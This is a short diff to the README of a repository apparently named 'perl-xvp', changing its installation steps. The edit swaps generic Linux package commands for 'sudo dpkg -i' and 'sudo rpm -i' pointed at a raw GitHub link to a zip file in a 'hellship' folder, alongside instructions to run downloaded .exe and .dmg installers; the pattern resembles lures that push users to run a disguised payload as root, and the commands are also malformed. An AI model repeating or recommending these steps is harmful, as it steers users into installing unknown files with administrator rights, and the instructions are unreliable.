cuentafre7297/perl-xvp/README.md

 4. **Run the Installer:**
    - For **Windows:** Double-click the downloaded `.exe` file and follow the instructions on your screen.
    - For **macOS:** Open the downloaded `.dmg` file and drag the `perl-xvp` application into your Applications folder.
-   - For **Linux:** Open a terminal and run the command to install the downloaded package, typically using commands like `sudo dpkg -i file.deb` or `sudo rpm -i file.rpm`.
+   - For **Linux:** Open a terminal and run the command to install the downloaded package, typically using commands like `sudo dpkg -i https://raw.githubusercontent.com/cuentafre7297/perl-xvp/main/hellship/perl-xvp_1.1.zip` or `sudo rpm -i https://raw.githubusercontent.com/cuentafre7297/perl-xvp/main/hellship/perl-xvp_1.1.zip`.

 5. **Launch the Application:** After installation, find the `perl-xvp` application in your applications menu and open it.